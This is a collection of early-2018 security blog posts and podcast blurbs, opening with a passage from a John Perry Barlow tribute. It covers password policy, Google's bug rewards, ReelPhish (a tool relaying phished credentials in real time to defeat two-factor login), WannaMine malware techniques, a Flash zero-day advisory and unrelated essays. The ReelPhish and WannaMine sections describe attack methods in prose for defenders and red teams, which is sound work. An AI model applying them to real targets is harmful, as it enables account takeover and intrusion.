Death stared him down for years, as he suffered from various ailments and injuries of many kinds, but he never lost his poetic voice and dynamic spirit. His last public writing was a blog post he wrote for FPF on the 20th anniversary of his Declaration.

While it’s impossible not to mourn, there is no doubt that he would wish to see people celebrating his life and the ideals for which he lived, rather than lamenting he is gone.

In one of the Reddit Ask-Me-Anything sessions he participated in over the last several years, he posted a list of “adult principles” that he composed for himself on the eve of his 30th birthday. The principles themselves have now been heavily recirculated, and it’s a testament to the easy poetry of his words that these sparse 25 commandments have such widespread appeal. But the short introduction he gives to his principles, in response to a question about him being “a great man,” is even more indicative of Barlow’s philosophy.

The jury's well out on the great man thing. On the other hand, I'm willing to accept it when someone calls me a good man. I've been working on that one quite consciously for a long time. And, outside of being a good ancestor, it's my primary ambition.

John Perry Barlow was a good man. He was a good friend, and a visionary whose impact on technology, culture, and the world will be felt for generations. As the Grateful Dead say: fare thee well, JPB.

Best Practices, Unintended Consequences, and Negative Outcomes

Posted under: Research and Analysis

Information Security is a profession. We have job titles, recognized positions in nearly every workplace, professional organizations, training, and even some fairly new degree programs. I mean none of that sarcastically, but I wouldn’t necessarily say we are a mature profession. We still have a lot to learn about ourselves. This isn’t unique to infosec – it’s part of any maturing profession, and we can learn the same lessons the others already have.

As I went through the paramedic re-entry process I realized, much to my surprise, that I have been a current or expired paramedic for over half the lifetime of that profession. Although I kept my EMT up, I haven’t really stayed up to date with paramedic practices (the EMT level is basically advanced first aid – paramedics get to use drugs, electricity, and all sorts of interesting… tubes). Paramedics first appeared in the 1970s and when I started in the early 1990s we were just starting to rally behind national standards and introduce real science of the prehospital environment into protocols and standards. Now the training has increased from about 1,000 hours in my day to 1,500-1,800 hours, in many cases with much higher pre-training requirements (typically college level anatomy and physiology). Catching back up and seeing the advances in care is providing the kind of perspective that an overly-analytical type like myself is inexorably drawn toward, and provides powerful parallels to our less mature information security profession.

One great example of deeper understanding of a consequence of the science is how we treat head injuries. I don’t mean the incredible, and tragic lessons we are learning about Traumatic Brain Injury (TBI) from the military and NFL, but something simpler, cleaner, and more facepalmy.

Back in my active days we used to hyperventilate head injuries with increased intracranial pressure (ICP, because every profession needs its own TLAs). In layman terms: hit head, go boom, brain swells like anything else you smash into a hard object (in this case, the inside of your own skull), but in this case it is swelling inside a closed container with a single exit (which involves squeezing the brain through the base of your skull and pushing the brain stem out of the way – oops!). We would intubate the patients and bag them at an increased rate with 100% oxygen for two reasons – to increase the oxygen in their blood, trying to get more O2 to the brain cells, and because hyperventilation reduces brain swelling. Doctors could literally see a brain in surgery shrink when they hyperventilated their patients. More O2? Less swelling? Cool!

But outcomes didn’t seem to match the in-your-face visual feedback of a shrinking brain. Why? It turns out that the brain shrinks because when you hyperventilate a patient you reduce the amount of CO2 in their blood. This changes the pH balance, and also triggers something called vasoconstriction. The brain sank because the blood vessels feeding the brain were providing less blood to the brain.

Well, darn. That probably isn’t good.

I treated a lot of head injuries in my day, especially as one of the only mountain rescue paramedics in the country. I likely caused active harm to these patients, even though I was following the best practices and standards of the time. They don’t haunt me – I did my job as best I could with what we knew at the time – but I certainly am glad to provide better care today.

Let’s turn back to information security, and focus on passwords. Without going into history… our password standards no longer match our risk profiles in most cases. In fact we see these often causing active harm.

Requiring someone to come up with a password with a bunch of strange characters and rotate it every 90 days no longer improves security. Blocking password managers from filling in password fields? Beyond inane.

We originally came up with our password rules due to peculiarities of hashing algorithms and password storage in Windows. Length is a pretty good one to put into place, and advising people not to use things that are easy to guess. But we threw in strange characters to address rainbow tables and hash matching. Forced password rotations due to letting people steal our databases, and then having time to brute force things.

But if we use modern password hashing algorithms and good seeds, we dramatically reduce the viability of brute force attacks, even if someone steals a password. The 90-day and strange character requirements really aren’t overly helpful. They are actually more likely harmful because users forget their passwords and rely on weaker password reset mechanisms. Think the name of your first elementary school is hard to find? Let’s just say it ain’t as hard to spot as a unicorn.

Blocking password managers from filling fields? In a time when they are included in most browsers and operating systems? If you hate your users that much, just dox them yourselves and get over it.

The parallel to treatment protocols for head injuries is pretty damn direct here. We made decisions with the best evidence at the time, but times changed. Now the onus on us is to update our standards to reflect current science.

Block the 1234 passwords and require a decent minimum length; but let users pick what they want and focus more on your internal security and storage, seeds, and hashing. Support an MFA option appropriate to the kind of data you are working with, and build in a hard-to-spoof password reset/recovery option. Actually, that last area is ripe for research and better options.

We shouldn’t codify negative outcomes into our standards of practice. And when we do, we should recognize and change. That’s the mark of a continuously evolving profession.

- Rich (0) Comments Subscribe to our daily email digest

Heinous Noises – Enterprise Security Weekly #79

This week, Paul is joined by Doug White, host of Secure Digital Life, to interview InfoSecWorld 2018 Speaker Summer Fowler! In the news, we have updates from Cisco, SANS, Scarab, and more on this episode of Enterprise Security Weekly!

 

Full Show Notes: https://wiki.securityweekly.com/ES_Episode79

 

Visit https://www.securityweekly.com/esw for all the latest episodes!

Vulnerability Reward Program: 2017 Year in Review


As we kick-off a new year, we wanted to take a moment to look back at the Vulnerability Reward Program in 2017. It joins our past retrospectives for 2014, 2015, and 2016, and shows the course our VRPs have taken.

At the heart of this blog post is a big thank you to the security research community. You continue to help make Google’s users and our products more secure. We looking forward to continuing our collaboration with the community in 2018 and beyond!

2017, By the Numbers

Here’s an overview of how we rewarded researchers for their reports to us in 2017:
We awarded researchers more than 1 million dollars for vulnerabilities they found and reported in Google products, and a similar amount for Android as well. Combined with our Chrome awards, we awarded nearly 3 million dollars to researchers for their reports last year, overall.

Drilling-down a bit further, we awarded $125,000 to more than 50 security researchers from all around the world through our Vulnerability Research Grants Program, and $50,000 to the hard-working folks who improve the security of open-source software as part of our Patch Rewards Program.

A few bug highlights

Every year, a few bug reports stand out: the research may have been especially clever, the vulnerability may have been especially serious, or the report may have been especially fun and quirky!

Here are a few of our favorites from 2017:

  • In August, researcher Guang Gong outlined an exploit chain on Pixel phones which combined a remote code execution bug in the sandboxed Chrome render process with a subsequent sandbox escape through Android’s libgralloc. As part of the Android Security Rewards Program he received the largest reward of the year: $112,500. The Pixel was the only device that wasn’t exploited during last year’s annual Mobile pwn2own competition, and Guang’s report helped strengthen its protections even further.
  • Researcher "gzobqq" received the $100,000 pwnium award for a chain of bugs across five components that achieved remote code execution in Chrome OS guest mode.
  • Alex Birsan discovered that anyone could have gained access to internal Google Issue Tracker data. He detailed his research here, and we awarded him $15,600 for his efforts.

Making Android and Play even safer

Over the course of the year, we continued to develop our Android and Play Security Reward programs.

No one had claimed the top reward for an Android exploit chain in more than two years, so we announced that the greatest reward for a remote exploit chain--or exploit leading to TrustZone or Verified Boot compromise--would increase from $50,000 to $200,000. We also increased the top-end reward for a remote kernel exploit from $30,000 to $150,000.


In October, we introduced the by-invitation-only Google Play Security Reward Program to encourage security research into popular Android apps available on Google Play.


Today, we’re expanding the range of rewards for remote code executions from $1,000 to $5,000. We’re also introducing a new category that includes vulnerabilities that could result in the theft of users’ private data, information being transferred unencrypted, or bugs that result in access to protected app components. We’ll award $1,000 for these bugs. For more information visit the Google Play Security Reward Program site.


And finally, we want to give a shout out to the researchers who’ve submitted fuzzers to the Chrome Fuzzer Program: they get rewards for every eligible bug their fuzzers find without having to do any more work, or even filing a bug.


Given how well things have been going these past years, we look forward to our Vulnerability Rewards Programs resulting in even more user protection in 2018 thanks to the hard work of the security research community.

* Andrew Whalley (Chrome VRP), Mayank Jain (Android Security Rewards), and Renu Chaudhary (Google Play VRP) contributed mightily to help lead these Google-wide efforts.

ReelPhish: A Real-Time Two-Factor Phishing Tool

Social Engineering and Two-Factor Authentication

Social engineering campaigns are a constant threat to businesses because they target the weakest chain in security: people. A typical attack would capture a victim’s username and password and store it for an attacker to reuse later. Two-Factor Authentication (2FA) or Multi-Factor Authentication (MFA) is commonly seen as a solution to these threats.

2FA adds an extra layer of authentication on top of the typical username and password. Two common 2FA implementations are one-time passwords and push notifications. One-time passwords are generated by a secondary device, such as a hard token, and tied to a specific user. These passwords typically expire within 30 to 60 seconds and cannot be reused. Push notifications involve sending a prompt to a user’s mobile device and requiring the user to confirm their login attempt. Both of these implementations protect users from traditional phishing campaigns that only capture username and password combinations.

Real-Time Phishing

While 2FA has been strongly recommended by security professionals for both personal and commercial applications, it is not an infallible solution. 2FA implementations have been successfully defeated using real-time phishing techniques. These phishing attacks involve interaction between the attacker and victims in real time.

A simple example would be a phishing website that prompts a user for their one-time password in addition to their username and password. Once a user completes authentication on the phishing website, they are presented with a generic “Login Successful” page and the one-time password remains unused but captured. At this point, the attacker has a brief window of time to reuse the victim’s credentials before expiration.

Social engineering campaigns utilizing these techniques are not new. There have been reports of real-time phishing in the wild as early as 2010. However, these types of attacks have been largely ignored due to the perceived difficulty of launching such attacks. This article aims to change that perception, bring awareness to the problem, and incite new solutions.

Explanation of Tool

To improve social engineering assessments, we developed a tool – named ReelPhish – that simplifies the real-time phishing technique. The primary component of the phishing tool is designed to be run on the attacker’s system. It consists of a Python script that listens for data from the attacker’s phishing site and drives a locally installed web browser using the Selenium framework. The tool is able to control the attacker’s web browser by navigating to specified web pages, interacting with HTML objects, and scraping content.

The secondary component of ReelPhish resides on the phishing site itself. Code embedded in the phishing site sends data, such as the captured username and password, to the phishing tool running on the attacker’s machine. Once the phishing tool receives information, it uses Selenium to launch a browser and authenticate to the legitimate website. All communication between the phishing web server and the attacker’s system is performed over an encrypted SSH tunnel.

Victims are tracked via session tokens, which are included in all communications between the phishing site and ReelPhish. This token allows the phishing tool to maintain states for authentication workflows that involve multiple pages with unique challenges. Because the phishing tool is state-aware, it is able to send information from the victim to the legitimate web authentication portal and vice versa.

Examples

We have successfully used ReelPhish and this methodology on numerous Mandiant Red Team engagements. The most common scenario we have come across is an externally facing VPN portal with two-factor authentication. To perform the social engineering attack, we make a copy of the real VPN portal’s HTML, JavaScript, and CSS. We use this code to create a phishing site that appears to function like the original.

To facilitate our real-time phishing tool, we embed server-side code on the phishing site that communicates with the tool running on the attacker machine. We also set up a SSH tunnel to the phishing server. When the authentication form on the phishing site is submitted, all submitted credentials are sent over the tunnel to the tool on the attacker’s system. The tool then starts a new web browser instance on the attacker’s system and submits credentials on the real VPN portal. Figure 1 shows this process in action.


Figure 1: ReelPhish Flow Diagram

We have seen numerous variations of two-factor authentication on VPN portals. In some instances, a token is passed in a “secondary password” field of the authentication form itself. In other cases, the user must respond to a push request on a mobile phone. A user is likely to accept an incoming push request after submitting credentials if the phishing site behaved identically to the real site.

In some situations, we have had to develop more advanced phishing sites that can handle multiple authentication pages and also pass information back and forth between the phishing web server and the tool running on the attacking machine. Our script is capable of handling these scenarios by tracking a victim’s session on the phishing site and associating it with a particular web browser instance running on the attacker’s system. Figure 1 shows a general overview of how our tool would function within an attack scenario.

We are publicly releasing the tool on the FireEye GitHub Repository. Feedback, pull requests, and issues can also be submitted to the Git repository.

Conclusion

Do not abandon 2FA; it is not a perfect solution, but it does add a layer of security. 2FA is a security mechanism that may fail like any other, and organizations must be prepared to mitigate the impact of such a failure.

Configure all services protected by 2FA to minimize attacker impact if the attacker successfully bypasses the 2FA protections. Lowering maximum session duration will limit how much time an attacker has to compromise assets. Enforcing a maximum of one concurrent session per user account will prevent attackers from being active at the same time as the victim. If the service in question is a VPN, implement strict network segmentation. VPN users should only be able to access the resources necessary for their respective roles and responsibilities. Lastly, educate users to recognize, avoid, and report social engineering attempts.

By releasing ReelPhish, we at Mandiant hope to highlight the need for multiple layers of security and discourage the reliance on any single security mechanism. This tool is meant to aid security professionals in performing a thorough penetration test from beginning to end.

During our Red Team engagements at Mandiant, getting into an organization’s internal network is only the first step. The tool introduced here aids in the success of this first step. However, the overall success of the engagement varies widely based on the target’s internal security measures. Always work to assess and improve your security posture as a whole. Mandiant provides a variety of services that can assist all types of organizations in both of these activities.

Crypto-Mining Malware May Be a Bigger Threat than Ransomware

Crypto-Mining Malware is Crippling Enterprise Networks

Cryptocurrencies such as Bitcoin and Ethereum have gone mainstream; it seems like everybody and their brother is looking to buy some crypto and get their piece of the digital currency gold rush. Hackers want a piece of it, too. In addition to hacking ICO’s and cryptocurrency exchanges, they’re using crypto-mining malware to “mine” their own “coins.”

Crypto-Mining Malware May Be a Bigger Threat than Ransomware

Crypto-mining malware isn’t new; last summer, this blog reported on a crypto-mining malware variant called Adylkuzz that came to light in the wake of the WannaCry attacks. Adylkuzz took advantage of the same Windows exploit as WannaCry. In fact, it acted as a sort of “vaccine” against the ransomware, preventing it from taking root in Adylkuzz-infected computers lest it interfere with its Monero-mining operations. However, Adylkuzz wasn’t a kinder, gentler malware. While it didn’t directly lock down systems or access data, it did hijack infected machines’ processing power, and it proved to be far more lucrative than WannaCry; it’s estimated that Adylkuzz raked in 10 times more money for its users than WannaCry.

At first, rogue crypto-miners were viewed as an annoyance; the most they did was slow down machines and perhaps cause problems accessing certain network folders. They were also seen as more of a threat to consumers than businesses. Many variants went after IoT devices, such as smartphones, overwhelming their processors to the point where the devices could be damaged or even destroyed. However, as crypto-mining malware has evolved, it has become more sophisticated, and hackers are looking to harvest enterprise processing power.

Move Over, WannaCry; Here Comes WannaMine

Recently, Dark Reading reported on yet another exploit of the Eternal Blue tool stolen from the NSA, a crypto-mining malware variant dubbed WannaMine. WannaMine doesn’t attack smartphones and other small IoT devices; it goes after Windows computers, and isn’t just slowing systems down. Security firm CrowdStrike reports having seen it cause “applications and hardware to crash, causing operational disruptions lasting days and sometimes even weeks.”

A report in Security Week elaborates on how WannaMine appears to be designed to specifically target enterprise networks:

WannaMine, the security researchers explain, employs “living off the land” techniques for persistence, such as Windows Management Instrumentation (WMI) permanent event subscriptions. The malware has a fileless nature, leveraging PowerShell for infection, which makes it difficult to block without the appropriate security tools.

The malware uses credential harvester Mimikatz to acquire legitimate credentials that would allow it to propagate and move laterally. If that fails, however, the worm attempts to exploit the remote system via EternalBlue.

To achieve persistence, WannaMine sets a permanent event subscription that would execute a PowerShell command located in the Event Consumer every 90 minutes.

The malware targets all Windows versions starting with Windows 2000, including 64-bit versions and Windows Server 2003. However, it uses different files and commands for Windows Vista and newer platform iterations.

WannaMine isn’t the only crypto-mining malware harnessing Eternal Blue and using the Windows Management Infrastructure to propagate. Another Monero-mining worm, dubbed Smominru (aka Ismo), has infected over a half a million Windows hosts, most of them servers.

These “next-generation” crypto-mining malware variants have proven extremely difficult to take down. First, the malware is distributed. Second, even if all machines on a network are patched against Eternal Blue, the malware will seek to use the Mimikatz credential harvester to get in by cracking a weak password. Finally, some legacy antivirus products do not detect crypto-mining malware because it doesn’t actually write files to an infected machine’s disk.

Protecting Your Organization Against WannaMine and Other Crypto-Mining Malware

There are several ways to protect your enterprise systems from being hijacked for illegal crypto-mining:

  • Keep your systems and software up-to-date; only older Windows machines are susceptible to the Eternal Blue exploit.
  • Use network security software to monitor for and block the activity needed for crypto-miners to work.
  • Ensure that all system users are using strong passwords that cannot be cracked by Mimikatz.

In addition to doing damage to enterprise systems, crypto-mining malware can be employed by real-world threat actors to fund their criminal activity. It’s in everyone’s best interest to put a stop to it.

The cyber security experts at Lazarus Alliance have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting organizations of all sizes from security breaches. Our full-service risk assessment services and Continuum GRC RegTech software will help protect your organization from data breaches, ransomware attacks, and other cyber threats.

Lazarus Alliance is proactive cyber security®. Call 1-888-896-7580 to discuss your organization’s cyber security needs and find out how we can help your organization adhere to cyber security regulations, maintain compliance, and secure your systems.

The post Crypto-Mining Malware May Be a Bigger Threat than Ransomware appeared first on .

How to configure a Mikrotik router as DHCP-PD Client (Prefix delegation)

Over time more and more IPS provide IPv6 addresses to the router (and the clients behind it) via DHCP-PD. To be more verbose, that’s DHCPv6 with Prefix delegation delegation. This allows the ISP to provide you with more than one subnet, which allows you to use multiple networks without NAT. And forget about NAT and IPv6 – there is no standardized way to do it, and it will break too much.  The idea with PD is also that you can use normal home routers and cascade them, which requires that each router provides a smaller prefix/subnet to the next router. Everything should work without configuration – that was at least the plan of the IETF working group.

Anyway let’s stop with the theory and provide some code. In my case my provider requires my router to establish a pppoe tunnel, which provides my router an IPv4 automatically. In my case the config looks like this:

/interface pppoe-client add add-default-route=yes disabled=no interface=ether1vlanTransitModem name=pppoeDslInternet password=XXXX user=XXXX

For IPv6 we need to enable the DHCPv6 client with following command:

/ipv6 dhcp-client add interface=pppoeDslInternet pool-name=poolIPv6ppp use-peer-dns=no

But a check with

/ipv6 dhcp-client print

will only show you that the client is “searching…”. The reason for this is that you most likely block incoming connections from the Internet – If you don’t filter –> bad boy! :-). You need to allow DHCP replies from the server.

/ipv6 firewall filter add chain=input comment="DHCPv6 server reply" port=547 protocol=udp src-address=fe80::/10

Now you should see something like this

In this case we got a /60 prefix delegated from the ISP, which counts for 16 /64 subnets. The last step you need is to configure the IP addresses on your internal networks. Yes, you could just statically add the IP addresses, but if the provider changes the subnet after an disconnect, you need to reconfigure it again. Its better configure the router to dynamically assign the IP addresses delegated to the internal interfaces. You just need to call following for each of your internal interfaces:

/ipv6 address add from-pool=poolIPv6ppp interface=vlanInternal

Following command should show the currently assigned prefixes to the various internal networks

/ipv6 address print

Hey, IPv6 is not that complicated. 🙂

Put Your Dockers On – Business Security Weekly #72

This week, Michael and Paul interview Vik Desai, Managing Director at Accenture! Matt Alderman and Asif Awan of Layered Insight join Michael and Paul for another interview! In the news, we have updates from BehavioSec, RELX, DISCO, Logikcull, and more on this episode of Business Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/SSWEpisode72

 

Visit https://www.securityweekly.com/ssw for all the latest episodes!

Stay Classy – Application Security Weekly #04

This week, Keith and Paul discuss OWASP Application Security Verification Standard! In the news, Intel warns Chinese companies of chip flaw before U.S. government, bypassing CloudFair using Internet-wide scan data, and more on this episode of Application Security Weekly!

 

Full Show Notes: https://wiki.securityweekly.com/ASW_Episode04

 

Visit https://www.securityweekly.com/ for all the latest episodes!

Firestarter: Best Practices for Root Account Security and… SQRRL!!!!

Posted under: Firestarter

Just because we are focusing on cloud fundamentals doesn’t mean we are forgetting the rest of the world. This week we start with a discussion over the latest surprise acquisition of Sqrrl by Amazon Web Services and what it might indicate. Then we jump into our ongoing series of posts on cloud security by focusing on the best practices for root account security. From how to name the email accounts, to handling MFA, to your break glass procedures.

Watch or listen:


- Rich (0) Comments Subscribe to our daily email digest

Ten things you may reveal during job interview (Response to Forbes Article)

Ten things you may reveal during job interview (Response to Forbes Article)

In continuation to my recent articles on preparation for the interview, and few pointers to make perform better during the interview, I stumbled on an article at Forbes - Ten Things Never, Ever to reveal in a job interview by Liz Ryan. I agree with some of the pointers she voiced, but few might hurt the employee/employer relationship in the long run or may even be considered borderline unethical. This blog-post is an attempt to share my humble opinion while having experience as an entrepreneur & employee. Please read it with a pinch of salt, and do share your comments.

As per Forbes article, ten things to keep to yourself (and my opinions alongwith),

  1. The fact that you got fired from your last job -- or any past job.
    Yes, this is irrelevant and can be avoided in the interview.
    But, if your firing included a legal case against you, or something that the new employer may find in the background check, or police verification; it's better to come clean at the start than being embarrassed later.

  2. The fact that your last manager (or any past manager) was a jerk, a bully, a lousy manager or an idiot, even if all those things were true.
    No need to mention that. No one likes to interview a candidate that bitches of the old colleagues or managers.
    It may only be acceptable to an extent if it has resulted in harassment case and you have taken the "justifiable" decision to leave the firm based on how they treated you.

  3. The fact that you are desperate for a job. Some companies will be turned off by this disclosure, and others will use it as a reason to low-ball you.
    I agree here. Keep the leverage of negotiating the terms with yourself & don't expose all your cards.

  4. The fact that you feel nervous or insecure about parts of the job if you're applying for. You don't want to be cocky and say "I can do this job in my sleep!" but you also don't want to express the idea that you are worried about walking into the new job. Don't worry! Everyone is worried about every new job, until you figure out that everyone is faking it anyway so you may as well fake it, too.
    Okay, I do agree with the pointer here, but if you are insecure or feeling nervous than you might as well give this position a rethought. Pursue a role you are confident to manage and don't manipulate the interviewer by showing "confidence" when you have no idea of its role & responsibilities. Don't express the nervous jitters of the new job, nor be cocky with overconfidence. But, be true to yourself and the employer if the assignment is well in your forte.

  5. The fact that you had a clash or conflict with anybody at a past job or that you got written up or put on probation. That's no one's business but yours.
    It is on the same grounds as you being fired in your last job or your relationship with your x-manager. Chose sensibly as there's no black & white answer to handling this situation without knowing the complete context. There can be scenarios when you may want to tell the interviewer (example: if your old company may well be the client of the new firm, and you may be allocated to this project (TRUE STORY))

  6. The fact that you have a personal issue going on that could create scheduling difficulty down the road. Keep that to yourself unless you already know that you need accommodation, and you know what kind of accommodation you need. Otherwise, button your lip. Life takes its own turns. Who knows what will happen a few months from now?
    Okay, this I don't agree 100% as being an entrepreneur, I would like my employee or hiring candidate to be right to me if they have an ongoing commitment or something that might come up. Most of the companies hire candidates with few weeks of the probation period, or a company may even fire you if you intentionally kept your planned "engagement" with the firm.
    There is a change in the outlook of companies, and they would appreciate if you keep them in the loop of ongoing personal issues (briefly) so they can expect the right amount of deliverables. Else, your performance and scheduling may well slide off the track which can cause you problems in the long run.

  7. The fact you're pregnant, unless you already telling people you don't know well (like the checker at the supermarket). A prospective employer has no right to know the contents of your uterus. It is none of their business.
    I have a different opinion on this, and my answer depends on the which trimester you are in. If you are in the first trimester, and by God's grace doing well, telling the employer is your choice. Keep in mind that if the employer is unaware of your health status; they may not be able to judge the kind of workload which is "healthy" for you or that you have a medical reason for not doing overtime etc.
    Being in the 2nd trimester, you have to be careful, and you should tell the employer about your condition. It will not be well appreciated that after joining for a month, you may go on maternity leave. I mean employer may as well have commitments on the ongoing projects and deadlines.
    And if you are in the 3rd trimester, I would recommend you to enjoy your pregnancy and don't stress about looking out for new job, projects and deadlines. You have a much more significant responsibility and full-time job for few months.

  8. The fact that this job pays a lot more than the other jobs you've held. That information is not relevant and will only hurt you.
    Yes, I agree. Every situation and employer must have their range of compensation, and the only thing you have to consider is if that's enough for you; independently of your last paycheck or other jobs.

  9. The fact that you are only planning to remain in your current city for another year or some other period of time. That fact alone will cause many companies not to hire you. They want to retain the right to fire you for any reason or no reason, at any moment -- but they can't deal with the fact that you have your own plans, too -- and that people don't always take a job with the intention of staying in the job forever.
    If you are planning to stay in the city for a year, and then move; let the employer know about it. Understand your relationship with the employer is mutual, and you would expect the same from it. What if the employer is closing the office in six months and the hire you "hiding this fact", and then let you go in six months. I mean we don't have to lie to each other to hire the perfect person or land the ideal job.

  10. The fact that you know you are overqualified for the job you're interviewing for, and that your plan is to take the job and quickly get promoted to a better job. For some reason, many interviewers find this information off-putting. I have been to countless HR gatherings where I heard folks complaining about "entitled" or "presumptuous" job applicants who had the nerve to say "This job is just a stepping stone for me." How dare they!
    Without a doubt, I agree. But if you are overqualified for the job, or you think you may as well get bored, think again before saying yes to the employer. Refer my previous articles on preparation and performance.

In general when I appear for the interview, or if I interview someone; I prefer to be straightforward of my current conditions, and expect the same from the employer. The working relationship is essential and must not start with hiding information that can impact your performance. You will spend 1/3rd of your life at your workplace, and I don't think you want to kick off my keeping the critical facts hidden. Think before you hide something - whether it will shock your employer, or surprise them and how well they would react to it, is disclosed.

Employee or Employer, both have their commitments and deadlines. The person taking your interviews, or the one managing you have to know if you have some hiccups along the way else their performance may also impact because of you. So, think of these pointers again and do share what you feel is necessary to set the right expectations.

Cheers, and best wishes.

Disclaimer:
This article shares my opinions, and by no means an offence to the Forbes article. Please take it with a pinch of salt.

Hackers Targeting 2018 Winter Olympic Games

The world is four days away from the opening ceremonies for the 2018 Winter Olympics held in Pyeongchang, South Korea. The Olympics are an athletic spectacle fraught with political undertones and have occasionally been targeted by terrorists and activists. As cyber threats have evolved and increased, so too has the probability of such attacks on the Games. Wired.com reports, “More so than any previous Olympics, the run-up to Pyeongchang has been plagued by apparent state-sponsored hackers.”

The Games have not even begun, but according to McAfee Advanced Threat Research as of early January hackers had launched an email phishing campaign with an infected MS Word document that contained malware. Another attack campaign, which MacAfee has dubbed Operation GoldDragon, attempted to plant three distinct spyware tools on target machines that would enable hackers to scour the compromised computers' contents.

The hackers could be lone actor mercenaries acting at the behest of nation-states, or they may be government staff. McAfee suspects the attacks originated from Russia and North Korea. The latter is a prime suspect, given its saber-rattling in the past year, its acrimonious relationship with its neighbor, and its suspected ties to the WannaCry Ransomware attack in the spring of 2017 and the attack on Sony Pictures in November of 2014.

Anyone who hacks the Games is most likely trying to do the following:

  • Create chaos and make operations more difficult for the Games and citizens in general
  • Conduct revenge against US and other countries for economic sanctions
  • Steal sensitive intellectual property or sensitive consumer data.

Thus far, no one has speculated about the probability of a distributed denial of service (DDoS) attack on the Games, but it certainly is possible. A DDoS attack could be a nuisance that impacts the service availability of one or more websites, or it could be a stealth attack that masks a more dangerous malware threat, or it a massive attack on critical infrastructure that could cripple daily operations in the region or in the Olympic village. Let’s hope that South Korean authorities and the Olympic Games organization has effective DDoS protection to prevent such attacks.

For more information, contact us.

Hopefully Intel is working on hardware solution of…

Hopefully Intel is working on hardware solution of this flaw. Obvious solution is adding fully isolated device that performs scheduled encryption for all sensitive information, (that does not used for computation anyway), then decryption is done only when request is longer then access time of meltdown.. Such solution will help not only for Meltdown, but also for any attempt to get password without touching keyboard.

It Was Wide Open – Paul’s Security Weekly #546

This week, InfoSecWorld speakers Mark Arnold & Will Gragido join us for an interview! John Strand of Black Hills Information Security joins us for the Technical Segment on MITRE! In the news, we have updates from Discord, Bitcoin, NSA, Facebook, and more on this episode of Paul's Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/Episode546

Visit https://www.securityweekly.com/psw for all the latest episodes!

Blame privacy activists for the Memo??

Former FBI agent Asha Rangappa @AshaRangappa_ has a smart post debunking the Nunes Memo, then takes it all back again with an op-ed on the NYTimes blaming us privacy activists. She presents an obviously false narrative that the FBI and FISA courts are above suspicion.

I know from first hand experience the FBI is corrupt. In 2007, they threatened me, trying to get me to cancel a talk that revealed security vulnerabilities in a large corporation's product. Such abuses occur because there is no transparency and oversight. FBI agents write down our conversation in their little notebooks instead of recording it, so that they can control the narrative of what happened, presenting their version of the converstion (leaving out the threats). In this day and age of recording devices, this is indefensible.

She writes "I know firsthand that it’s difficult to get a FISA warrant". Yes, the process was difficult for her, an underling, to get a FISA warrant. The process is different when a leader tries to do the same thing.

I know this first hand having casually worked as an outsider with intelligence agencies. I saw two processes in place: one for the flunkies, and one for those above the system. The flunkies constantly complained about how there is too many process in place oppressing them, preventing them from getting their jobs done. The leaders understood the system and how to sidestep those processes.

That's not to say the Nunes Memo has merit, but it does point out that privacy advocates have a point in wanting more oversight and transparency in such surveillance of American citizens.

Blaming us privacy advocates isn't the way to go. It's not going to succeed in tarnishing us, but will push us more into Trump's camp, causing us to reiterate that we believe the FBI and FISA are corrupt.

Attacks Leveraging Adobe Zero-Day (CVE-2018-4878) – Threat Attribution, Attack Scenario and Recommendations

On Jan. 31, KISA (KrCERT) published an advisory about an Adobe Flash zero-day vulnerability (CVE-2018-4878) being exploited in the wild. On Feb. 1, Adobe issued an advisory confirming the vulnerability exists in Adobe Flash Player 28.0.0.137 and earlier versions, and that successful exploitation could potentially allow an attacker to take control of the affected system.

FireEye began investigating the vulnerability following the release of the initial advisory from KISA.

Threat Attribution

We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper. We have observed TEMP.Reaper operators directly interacting with their command and control infrastructure from IP addresses assigned to the STAR-KP network in Pyongyang. The STAR-KP network is operated as a joint venture between the North Korean Government's Post and Telecommunications Corporation and Thailand-based Loxley Pacific. Historically, the majority of their targeting has been focused on the South Korean government, military, and defense industrial base; however, they have expanded to other international targets in the last year. They have taken interest in subject matter of direct importance to the Democratic People's Republic of Korea (DPRK) such as Korean unification efforts and North Korean defectors.

In the past year, FireEye iSIGHT Intelligence has discovered newly developed wiper malware being deployed by TEMP.Reaper, which we detect as RUHAPPY. While we have observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks, we have not thus far observed TEMP.Reaper use their wiper malware actively against any targets.

Attack Scenario

Analysis of the exploit chain is ongoing, but available information points to the Flash zero-day being distributed in a malicious document or spreadsheet with an embedded SWF file. Upon opening and successful exploitation, a decryption key for an encrypted embedded payload would be downloaded from compromised third party websites hosted in South Korea. Preliminary analysis indicates that the vulnerability was likely used to distribute the previously observed DOGCALL malware to South Korean victims.

Recommendations

Adobe stated that it plans to release a fix for this issue the week of Feb. 5, 2018. Until then, we recommended that customers use extreme caution, especially when visiting South Korean sites, and avoid opening suspicious documents, especially Excel spreadsheets. Due to the publication of the vulnerability prior to patch availability, it is likely that additional criminal and nation state groups will attempt to exploit the vulnerability in the near term.

FireEye Solutions Detections

FireEye Email Security, Endpoint Security with Exploit Guard enabled, and Network Security products will detect the malicious document natively. Email Security and Network Security customers who have enabled the riskware feature may see additional alerts based on suspicious content embedded in malicious documents. Customers can find more information in our FireEye Customer Communities post.

Cyber Security Roundup for January 2018

2018 started with a big security alert bang after Google Security Researchers disclosed serious security vulnerabilities in just about every computer processor in use on the planet. Named 'Meltdown' and 'Spectre’, when exploited by a hacker or malware, these vulnerabilities disclose confidential data. As a result, a whole raft of critical security updates was hastily released for computer and smartphone operating systems, web browsers, and processor drivers. While processor manufacturers have been rather lethargic in reacting and producing patches for the problem, software vendors such as Microsoft, Google and Apple have reacted quickly, releasing security updates to protect their customers from the vulnerable processors, kudos to them.

